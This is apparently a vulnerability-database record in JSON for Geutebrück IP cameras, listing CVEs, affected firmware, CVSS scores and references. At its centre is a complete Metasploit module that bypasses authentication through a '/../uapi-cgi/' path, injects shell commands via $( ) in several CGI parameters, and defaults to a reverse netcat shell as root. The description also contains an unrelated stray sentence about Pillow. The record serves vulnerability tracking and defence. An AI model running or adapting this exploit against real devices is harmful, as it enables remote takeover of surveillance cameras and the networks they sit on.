          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.7,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/96209"
          },
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/41360/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5174"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5174"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          },
          {
            "trust": 0.3,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52663"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
            "ident": null
          },
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "date": "2017-02-14T00:00:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "date": "2017-02-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "date": "2017-05-19T03:29:00.230000",
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "date": "2017-03-07T04:02:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Geutebruck IP Camera G-Cam/EFD-2250 Access control vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0859

    Vulnerability from variot - Updated: 2025-01-30 22:27

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. G-Cam E2 and G-Code, provided by GEUTEBRUCK, contain the following multiple vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may include the following. * Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 * Arbitrary code is executed through command injection by a remote third party - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. No further information about this vulnerability is currently available; follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit remote exploit module class: it declares ExcellentRanking, mixes
    # in the HttpClient and CmdStager helpers and prepends AutoCheck.
    # NOTE(review): AutoCheck presumably runs `check` ahead of `exploit` -- confirm
    # against the framework. The page extraction has joined these declarations
    # onto one line.
    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    # Registers the module's metadata through update_info: name, description,
    # authors, references, platform, the target table and the default payload.
    #
    # The description gives the affected range as firmware <= 1.12.0.27 plus
    # 1.12.13.2 and 1.12.14.5, and the outcome as code execution as root; the
    # `check` method in this class compares against the same three versions.
    # The References list points at advisory ICSA-21-208-03 for the vendor side.
    #
    # NOTE(review): the page extraction has joined `def`, `super(` and the first
    # hash entries onto one line; the text is kept exactly as shown.
    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        # Target table: seven entries, one per CVE / CGI page pair. Every entry
        # uses GET and a 'uri' that begins with '/../uapi-cgi/'. One parameter
        # per entry carries the marker PLACEHOLDER_CMD, wrapped in $( ) in all
        # entries except testcmd.cgi, where the marker is the whole value; the
        # remaining parameters are fixed words or Rex::Text random filler.
        # Defender note: the '/../uapi-cgi/' path prefix and a $( ) sequence in
        # a query value for these pages are the request traits to look for in
        # web-server or proxy logs.
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        # The module declares that a run leaves artifacts on disk
        # ('SideEffects'), which is relevant when examining a device afterwards.
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    # Reads the firmware version the device reports in /brand.xml.
    #
    # Sends one GET for /brand.xml and returns the first dotted four-part
    # version found in the text of the <firmware> element. Returns false, after
    # printing an error, when there is no response, the body is empty, the
    # element is missing, or its text holds no such version.
    #
    # Defender note: the same lookup serves to inventory which cameras still
    # report a firmware version that `check` treats as affected.
    def firmware
      response = send_request_cgi(
        'method' => 'GET',
        'uri' => '/brand.xml'
      )
      if !response
        print_error('Connection failed!')
        return false
      end

      if !response.body || response.body.empty?
        print_error('Empty body in the response!')
        return false
      end

      firmware_node = response.get_xml_document.at('//firmware')
      if firmware_node.nil?
        print_error('Target did not respond with a XML document containing the "firmware" element!')
        return false
      end

      # Unanchored pattern: one leading digit, then three dot-separated groups
      # of one to three digits; the first such run in the text is returned.
      reported = firmware_node.text
      version_match = reported && reported.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      return version_match[0] if version_match

      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end

    # Classifies the target from the firmware version it reports.
    #
    # Returns CheckCode::Unknown when `firmware` could not extract a version,
    # CheckCode::Appears when the version is at or below 1.12.0.27 or is
    # exactly 1.12.13.2 or 1.12.14.5, and CheckCode::Safe otherwise.
    #
    # The verdict rests on the reported version string alone; this method
    # sends nothing beyond the /brand.xml request made by `firmware`.
    def check
      reported = firmware
      # `firmware` signals every failure with a literal false.
      if reported == false
        return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
      end

      rex_version = Rex::Version.new(reported)
      vprint_status("Found Geutebruck version #{rex_version}")

      # One upper bound plus two exact builds, evaluated in the original order.
      return CheckCode::Appears if rex_version <= Rex::Version.new('1.12.0.27')
      return CheckCode::Appears if rex_version == Rex::Version.new('1.12.13.2')
      return CheckCode::Appears if rex_version == Rex::Version.new('1.12.14.5')

      CheckCode::Safe
    end

    # Builds one HTTP request from the selected target entry and sends it.
    #
    # The target's 'http_method' chooses between the 'vars_get' and 'vars_post'
    # option keys, each 'http_vars' value containing the marker PLACEHOLDER_CMD
    # has that marker replaced with payload.encoded, and the result goes out
    # through send_request_cgi to the target's 'uri'.
    #
    # Defender note: what reaches the device is a single request to one of the
    # CGI paths listed in the target table, with the substituted value in a
    # parameter; web-server or proxy logs are where that request would show up.
    #
    # NOTE(review): the page extraction has joined `def exploit` with its first
    # statement, and the method's closing `end` with the class's; the text is
    # kept exactly as shown.
    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    # Every target defined in this module sets 'GET', so the else branch is
    # not reached by the table as written.
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    # `v.include?` assumes each value is a String -- the visible table holds
    # string literals and Rex::Text results (presumably strings; confirm).
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        # String#[]= with a string index replaces the first occurrence in
        # place, so the string stored in the target's hash is itself changed.
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    # The return value is discarded: no response status or body is inspected.
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    # Printed unconditionally; it does not confirm that anything ran.
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0859",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33550",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33550",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33550",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33550",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33550",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2087",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
